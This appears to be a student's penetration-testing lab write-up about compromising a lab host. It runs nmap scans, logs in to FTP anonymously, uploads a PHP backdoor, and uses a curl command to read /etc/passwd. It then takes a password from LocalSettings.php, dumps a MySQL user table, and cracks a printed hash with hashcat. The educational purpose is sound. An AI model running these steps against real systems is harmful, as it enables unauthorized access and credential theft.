Lab 7.1 - Exploiting Pippin
Exploiting pippin.shire.org (10.0.5.25)
The goal of this lab is to exploit and find vulnerabilities in the pippin.shire.org application. We will be using action recon and service enumeration, remote code execution, loot, and elevation.
Passive Recon
I wanted to scan the site to see if I could find any info that could help me better exploit it.
The image below appears to be a list of users, including the admin.
Active Recon and Service Enumeration
Check for open ports
do the default nmap scan
sudo nmap pippin.shire.org and sudo nmap 10.0.5.25
Open ports:
22/tcp - ssh
21/tcp - ftp
80/tcp - http
Check for port services and versions
sudo nmap -sV -p 80 10.0.5.25sudo nmap -sV -p 21 10.0.5.25sudo nmap -sV -p 22 10.0.5.25
Deliverable 1. Provide screenshots of open ports, their services, and their versions.
Browse to the website
Attempt to SSH as admin to the site
Connect to server with FTP
ftp 10.0.5.25
I attempted to see if I could execute commands with FTP but I was not able to since I don't have the correct credentials.
Deliverable 2. Provide screenshots of the services as they respond to client applications like web browsers and command-line clients.
Deliverable 3. Have you found any of the services particularly interesting? Please explain using annotated screenshots and brief captions or descriptions.
I think that FTP is going to be a great way to exploit the system. It looks like if I can get the right credentials, I can upload files to the remote host and also view remote system directories and files.
Remote Code Execution
Log into FTP with anonymous user
User: anonymous
Password: anonymous@domain.com
What is Anonymous FTP?Anonymous FTP is a means by which archive sites allow general access to their archives of information. These sites create a special account called "anonymous".
Traditionally, this special anonymous user account accepts any string as a password, although it is common to use either the password "guest" or one's electronic mail (e-mail) address. Some archive sites now explicitly ask for the user's e-mail address and will not allow login with the "guest" password. Providing an e-mail address is a courtesy that allows archive site operators to get some idea of who is using their services.
Upload a test file via FTP
sudo ftp 10.0.5.25
cd upload
put Iwillputglitteronyou.txt 
Deliverable 4. Upload a test file (give it a distinctive Safe for Work name) and provide proof that you've done so in the form of screenshots of commands and output.
Deliverable 5. Provide evidence of remote code execution such that you can output the systems /etc/passwd file. How did you do this? Are there any accounts of interest? (At this point you should at least have the privileges of the attacked service)
I uploaded a php backdoor called
hannelore-backdoor.phpto the ftp server.
I then used the command
curl "http://10.0.5.25/upload/hannelore-backdoor.php?cmd=cat+/etc/passwd"to remotely execute the commands on the webserver.
Test your uploaded file in the browser
Since ftp allowed us to upload files to the server, we can use that to
https://www.kali.org/tools/php-defaults/
Loot
By leveraging a permissions issue in a misconfigured service, you should be able to find sensitive data if you look hard. Find the password!!!
Deliverable 6. What did you find and how did you find it? Can you leverage this data to your advantage?
Running the FTP server as root, I downloaded all PHP files to my local machine by using the
getcommand. I did this so I wouldn't have to keep going back to the FTP server if I couldn't find the password in a file.
I then tried to grep each of the files for the
peregrinusername in case the password was associated with the username in some way.This did not turn up with anything in any of the files
I specifically took interest in the
LocalSettings.phpfile and catted it to look through the settings.Just by chance I opened this one and found the password, but I could have grepped the file with password instead of peregrin and would have found the password that way as well.
Here is the password in the LocalSettings.phpfile.
Deliverable 7. You should be able to get into pippin as an authorized user. Provide a screenshot showing your session and cat the user-flag.
ssh peregrin.took@10.0.5.25
Elevation
Now, the web server has an application, and that application stores its data in yet another service that you likely did not see during your active reconnaissance. Leverage some of the secret data you've found to interact with this internal service to see if there is any other information about users that you might be able to use.
Deliverable 8. Enumerate this internal data source to determine where and in what fields useful data might exist. You very likely learned about this system in SYS255,265 and SEC260. Break out your old notes and get on with it. Describe what you found. In the end, you are looking for a new identity and a credential.
Since we found information from the SQL database above, we should start by logging into the SQL database.
mysql -u root -p
SHOW DATABASES;
USE mediawiki;
SHOW TABLES; 
SELECT * FROM user
Going back to the main directory, I catted the pippin_hash.txtfile to see what hash was inside. It was the same hash that I found in the SQL database!
Crack the Hash!
sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==The password starts with a lowercase 'p'
Filter the password file with
grep -v 'P' CommonPasswords.txt > no_P_passwords.txt
it is in rockyou
hashcat -m 12100 -a 0 pippin_hash.txt no_P_password.txt
Last updated